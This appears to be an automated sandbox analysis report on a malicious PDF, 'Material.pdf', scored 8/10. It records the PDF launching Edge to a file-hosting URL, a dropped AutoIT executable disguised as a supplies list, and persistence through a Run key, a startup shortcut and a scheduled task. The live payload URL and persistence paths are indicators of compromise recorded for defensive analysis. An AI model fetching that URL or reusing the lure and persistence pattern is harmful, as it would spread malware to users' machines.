60541635bdb3c008a9cfa15d8df82d45ec742131c9b4ad1858b558ef7df2af38

Resubmissions

25-01-2023 13:46

230125-q3dq6sge75 8

25-01-2023 13:44

230125-q1t1dage67 3

Analysis

max time kernel
95s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2023 13:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Material.pdf
Size

350KB
MD5

72c812cf21909a48eb9cceb9e04b865d
SHA1

2dc265f23be4cf7cda328bdf5826601cf4f4bf43
SHA256

39fb927c32221134a423760c5d1f58bca4cbbcc87c891c79e390a22b63608eb4
SHA512

dd246487f348dbba52c7dfaae3f943b0324414c182e0de862db7d23e82ab5362c21b8733cf84af466529c631938fc544d96d78c51ea4330877993e9da7e5cbd3
SSDEEP

6144:zB1De0g/RC7lTqMAwraJOZMtXEHJGPSgwsTx/xE99jvQrZqZDxlK0oZ9TK2A6CO8:6+lq1wWAZMtUHJGPksFJYtdlK5TXuWM

Score

8^/10

persistence

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

SUPPLIES LIST.....exeSUPPLIES LIST.....exe

pid process

5140 SUPPLIES LIST.....exe
5124 SUPPLIES LIST.....exe
Drops startup file 1 IoCs

Processes:

SUPPLIES LIST.....exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VZOMCK.lnk SUPPLIES LIST.....exe

pid	process
5140	SUPPLIES LIST.....exe
5124	SUPPLIES LIST.....exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VZOMCK.lnk	SUPPLIES LIST.....exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exeSUPPLIES LIST.....exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run	SUPPLIES LIST.....exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VZOMCK = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\HFHVFU.exe\""	SUPPLIES LIST.....exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\SUPPLIES LIST.....exe	autoit_exe
C:\Users\Admin\Downloads\SUPPLIES LIST.....exe	autoit_exe
C:\Users\Admin\Downloads\SUPPLIES LIST.....exe	autoit_exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\48645cc1-07e0-4c9b-bf99-55ac4879738e.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230125144721.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5496 schtasks.exe

pid	process
5496	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 3 IoCs

Processes:

msedge.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exeidentity_helper.exeAcroRd32.exeSUPPLIES LIST.....exe

pid	process
860	msedge.exe
860	msedge.exe
4908	msedge.exe
4908	msedge.exe
4860	msedge.exe
4860	msedge.exe
4632	msedge.exe
4632	msedge.exe
4896	identity_helper.exe
4896	identity_helper.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe
5140	SUPPLIES LIST.....exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

SUPPLIES LIST.....exe

pid process

5140 SUPPLIES LIST.....exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

4908 msedge.exe
4908 msedge.exe
4908 msedge.exe
4908 msedge.exe
4908 msedge.exe
4908 msedge.exe

pid	process
5140	SUPPLIES LIST.....exe

pid	process
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

7zG.exe

description	pid	process
Token: SeRestorePrivilege	6092	7zG.exe
Token: 35	6092	7zG.exe
Token: SeSecurityPrivilege	6092	7zG.exe
Token: SeSecurityPrivilege	6092	7zG.exe

Suspicious use of FindShellTrayWindow 22 IoCs

Processes:

AcroRd32.exemsedge.exe7zG.exe

pid	process
1476	AcroRd32.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
6092	7zG.exe

Suspicious use of SetWindowsHookEx 21 IoCs

Processes:

AcroRd32.exeOpenWith.exe

pid	process
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
1476	AcroRd32.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe
3556	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AcroRd32.exemsedge.exeRdrCEF.exe

description	pid	process	target process
PID 1476 wrote to memory of 2936	1476	AcroRd32.exe	RdrCEF.exe
PID 1476 wrote to memory of 2936	1476	AcroRd32.exe	RdrCEF.exe
PID 1476 wrote to memory of 2936	1476	AcroRd32.exe	RdrCEF.exe
PID 1476 wrote to memory of 4908	1476	AcroRd32.exe	msedge.exe
PID 1476 wrote to memory of 4908	1476	AcroRd32.exe	msedge.exe
PID 4908 wrote to memory of 4616	4908	msedge.exe	msedge.exe
PID 4908 wrote to memory of 4616	4908	msedge.exe	msedge.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 2604	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe
PID 2936 wrote to memory of 1724	2936	RdrCEF.exe	RdrCEF.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Material.pdf"
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1476

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
2⤵
- Suspicious use of WriteProcessMemory
PID:2936

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=61468891C9DE31CFB56D62A1C6946B11 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:2604

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3EBEC07EB3FD8B906DCA5C24370DF679 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3EBEC07EB3FD8B906DCA5C24370DF679 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
3⤵
PID:1724

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=87450048BC2E372CB78E65AA42B24525 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=87450048BC2E372CB78E65AA42B24525 --renderer-client-id=4 --mojo-platform-channel-handle=2176 --allow-no-sandbox-job /prefetch:1
3⤵
PID:2932

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6F9E8F7B7D970417E0AE6F64E6329F3E --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:3540

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=91CDA0E1FDFD02CE03A4CE5FFC46991F --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:4792

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E4553F01F9BB0147E4DDC9D69AA98381 --mojo-platform-channel-handle=2656 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
3⤵
PID:4328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://a.pomf.cat/hgfetb.R11
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffa455146f8,0x7ffa45514708,0x7ffa45514718
3⤵
PID:4616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
3⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
3⤵
PID:2412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
3⤵
PID:536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
3⤵
PID:4712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
3⤵
PID:4044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5228 /prefetch:8
3⤵
PID:4912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
